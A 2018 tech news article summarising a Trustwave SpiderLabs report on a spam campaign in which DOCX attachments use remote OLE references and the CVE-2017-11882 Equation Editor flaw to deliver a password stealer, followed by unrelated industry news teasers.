Story image

New email spam campaign ditches traditional Office macro infection tactic

19 Feb 18

Researchers at Trustwave’s SpiderLabs Blog have spotted a wave of spam emails that use Microsoft Office documents to download password stealers without having to activate Macros.

Often malware will hide in infected Microsoft Office documents commonly attached to spam emails. That malware will be disguised as a downloader that is launched if a victim allows Macros in a malicious document.

This is a common sight in spam delivered from the Necurs botnet, however a new sample has ditched the macro approach entirely and instead uses a Microsoft Office vulnerability to steal details from victims.

Researchers have been tracking an email spam campaign that uses a four-stage infection process to deliver attachments and then a password stealer.

That password stealer can also steal credentials from email clients, FTP and browser clients.

According to researchers, the spam campaign uses a number of different subject lines, often variations of the following:

  • TNT STATEMENT OF ACCOUNT – {random numbers}.
  • Request for Quotation (RFQ) - <{random numbers}>
  • Telex Transfer Notification
  • SWIFT COPY FOR BALANCE PAYMENT

Researchers explain:

“Word documents with Office 2007 Open XML Formats are based on XML and ZIP archive technologies. Anyone can easily manipulate data in a Word 2007 file programmatically or manually. As shown below, the DOCX attachment contains an embedded OLE object that has external references. This 'feature' allows external access to remote OLE objects to be referenced in the document.xml.rels.”

If a victim opens the document, it triggers the download and execution of a remote document file in the form of a rich text file (RTF).

The RFT exploits the MS Equation Editor Tool and in turn downloads a MSHTA command line that leads to a remote HTA file. That HTA file eventually leads to VBScript with obfuscated code, and a PowerShell script that runs a remote binary file.

The binary file then executes the password stealer malware.

The entire process draws on a Microsoft Office vulnerability discovered in July 2017. The vulnerability, CVE-2017-11882, affects multiple Microsoft Office platforms including Microsoft Office 200 7 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016.

Attackers can run arbitrary code by failing to properly handle objects in memory, also known as a Microsoft Office Memory Corruption vulnerability.

“It's pretty unusual to find so many stages and vectors being used to download malware,” researchers comment.

“This approach can be very risky for the malware author. If any one stage fails, it will have a domino effect on the whole process. Another noticeable point is that the attack uses file types (DOCX, RTF and HTA), that are not often blocked by email or network gateways unlike the more obvious scripting languages like VBS, JScript or WSF.”

Gartner names LogRhythm leader in SIEM solutions
Security teams increasingly need end-to-end SIEM solutions with native options for host- and network-level monitoring.
Cylance makes APIs available in endpoint detection offering
Extensive APIs enable security teams to more efficiently view, enrich, and contextualise real-time intelligence collected at the endpoint to keep systems secure.
NBN Co rolls out 'optimised' wholesale business bundles for ISPs
“We recognise some businesses are on nbn powered plans that have not been optimised for their needs," says Paul Tyler.
How Schneider Electric aims to simplify IT management
With IT Expert, Schneider Electric aims to ensure secure, vendor agnostic, wherever-you-go monitoring and visibility of all IoT-enabled physical infrastructure assets.
SolarWinds adds SDN monitoring support to network management portfolio
SolarWinds announced a broad refresh to its network management portfolio, as well as key enhancements to the Orion Platform. 
Preparing for the future of work – growing big ideas from small spaces
We’ve all seen it: our offices are changing from the traditional four walls - to no walls. A need to reduce real estate costs is a key driver, as is enabling a more diverse and agile workforce.
JASK prepares for global rollout of their AI-powered ASOC platform
The JASK ASOC platform automates alert investigations, supposedly freeing the SOC analyst to do what machines can’t. 
Pitfalls to avoid when configuring cloud firewalls
Flexibility and granularity of security controls is good but can still represent a risk for new cloud adopters that don’t recognise some of the configuration pitfalls.